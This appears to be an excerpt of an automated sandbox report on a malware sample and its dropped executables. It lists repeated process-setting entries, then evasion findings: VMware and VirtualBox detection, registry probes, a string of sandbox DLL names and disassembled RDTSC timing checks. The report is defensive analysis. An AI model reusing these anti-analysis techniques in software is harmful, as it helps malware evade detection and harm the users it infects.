Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: BlueMail.exe PID: 5640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Gxtuum.exe PID: 6836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Gxtuum.exe PID: 1252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vmwin.exe PID: 6304, type: MEMORYSTR

Contain functionality to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Code function: VMwareVM VMwareVMware VMwareVMware

17_2_00402BEB

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

graph_7-9717

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: c2bea0d661.exe	Binary or memory string: DIR_WATCH.DLL
Source: c2bea0d661.exe, 00000011.00000003.2161485786.0000000000B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: BABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
Source: BlueMail.exe, 0000000E.00000002.2270653977.0000000003401000.00000004.00000800.00020000.00000000.sdmp, c2bea0d661.exe, Gxtuum.exe, 00000016.00000002.2582870539.0000000002802000.00000004.00000800.00020000.00000000.sdmp, Gxtuum.exe, 00000017.00000002.2587726358.0000000003031000.00000004.00000800.00020000.00000000.sdmp, vmwin.exe, 0000001D.00000002.2710996354.0000000003281000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: c2bea0d661.exe	Binary or memory string: API_LOG.DLL

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF3022 second address: FF3026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF3026 second address: FF302A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF3308 second address: FF3318 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FDD5513FC22h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF3467 second address: FF346C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF35DC second address: FF35E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF3715 second address: FF372C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C441h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF372C second address: FF3730 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF3730 second address: FF3758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD5537C445h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jl 00007FDD5537C43Eh 0x00000014 push esi 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF5DAF second address: FF5DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FDD5513FC16h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF5DBC second address: FF5DD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push edx 0x0000000d js 00007FDD5537C436h 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF5DD4 second address: FF5DD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF5DD8 second address: FF5DF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FDD5537C443h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF5DF6 second address: FF5DFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF5DFC second address: FF5E64 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDD5537C436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jmp 00007FDD5537C449h 0x00000015 pop eax 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007FDD5537C438h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 or si, C77Bh 0x00000035 lea ebx, dword ptr [ebp+1245ABA6h] 0x0000003b mov ecx, 115E6900h 0x00000040 sub dword ptr [ebp+122D3F7Ah], eax 0x00000046 push eax 0x00000047 jns 00007FDD5537C44Ah 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF5F06 second address: FF5F12 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF5F12 second address: FF5F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF5FCC second address: FF5FD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF5FD1 second address: FF5FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF5FDE second address: FF5FE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF5FE2 second address: FF6072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 movsx edx, bx 0x0000000b push 00000000h 0x0000000d xor si, 72C0h 0x00000012 mov dword ptr [ebp+122D3827h], ebx 0x00000018 call 00007FDD5537C439h 0x0000001d pushad 0x0000001e jnc 00007FDD5537C440h 0x00000024 jmp 00007FDD5537C445h 0x00000029 popad 0x0000002a push eax 0x0000002b pushad 0x0000002c jp 00007FDD5537C43Ch 0x00000032 jnl 00007FDD5537C438h 0x00000038 popad 0x00000039 mov eax, dword ptr [esp+04h] 0x0000003d jmp 00007FDD5537C43Dh 0x00000042 mov eax, dword ptr [eax] 0x00000044 jl 00007FDD5537C440h 0x0000004a pushad 0x0000004b jo 00007FDD5537C436h 0x00000051 push eax 0x00000052 pop eax 0x00000053 popad 0x00000054 mov dword ptr [esp+04h], eax 0x00000058 js 00007FDD5537C444h 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF6072 second address: FF6076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF6076 second address: FF609D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov si, cx 0x0000000a push 00000003h 0x0000000c mov edx, dword ptr [ebp+122D31A2h] 0x00000012 push 00000000h 0x00000014 mov edx, ebx 0x00000016 push 00000003h 0x00000018 push A0B0C458h 0x0000001d push eax 0x0000001e push edx 0x0000001f jbe 00007FDD5537C43Ch 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF609D second address: FF60A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF60A1 second address: FF60D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 60B0C458h 0x00000011 jmp 00007FDD5537C43Ah 0x00000016 lea ebx, dword ptr [ebp+1245ABBAh] 0x0000001c jbe 00007FDD5537C43Ch 0x00000022 sub dword ptr [ebp+122D1E1Fh], ebx 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF60D5 second address: FF60DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE560E second address: FE5613 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1014B85 second address: 1014B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1014B8B second address: 1014B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1014B90 second address: 1014B95 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1015010 second address: 1015016 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1015016 second address: 101501C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101501C second address: 1015050 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDD5537C448h 0x0000000d jmp 00007FDD5537C444h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10152EE second address: 10152FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FDD5513FC16h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10152FD second address: 101530B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101530B second address: 101530F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101530F second address: 1015313 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1015313 second address: 1015319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1015B80 second address: 1015B84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1015B84 second address: 1015B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD5513FC24h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE719E second address: FE71B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FDD5537C43Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE71B2 second address: FE71B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
